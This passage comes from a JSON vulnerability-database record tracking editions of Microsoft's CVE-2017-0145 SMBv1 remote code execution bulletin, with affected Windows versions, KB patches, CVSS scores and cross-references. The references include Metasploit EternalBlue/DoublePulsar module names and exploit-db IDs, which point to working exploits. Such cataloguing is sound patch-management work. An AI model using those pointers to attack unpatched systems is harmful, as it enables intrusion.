"KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T08:45:23", "differentElements": ["msAffectedSoftware"], "edition": 70}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-20T10:55:46", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB3213986", "KB3210721", "KB3177186", "KB4012606", "KB4012217", "KB3212646", "KB4014077", "KB4012212", "KB4012214", "KB3205401", "KB4013429", "KB4012215", "KB3205409", "KB4012213", "KBMS16-110, 3187754", "KB4012216", "KB4013198", "KB3210720"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T10:55:46", "differentElements": ["msAffectedSoftware"], "edition": 71}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "32dd1c2d5f94ad64bc33322ba051cb15", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-20T12:46:46", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KBMS16-110, 3187754", "KB3212646", "KB4014077", "KB3210721", "KB4012598", "KB4013198", "KB4012215", "KB3205401", "KB4012606", "KB4012213", "KB3213986", "KB4012216", "KB4012217", "KB3210720", "KB4012212", "KB4012214", "KB3205409", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 